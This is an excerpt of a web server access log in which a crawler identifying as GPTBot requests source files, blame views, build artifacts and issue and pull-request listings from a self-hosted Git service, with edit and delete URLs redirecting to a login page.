"/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 3273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1379] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12601] [Gzip 5.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13780] [Gzip 7.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 16376] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" -[17/Feb/2026:18:53:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9931] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:53:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:53:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:53:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:53:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:18:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15123] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13728] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:18:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:53:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9873] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 1063] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 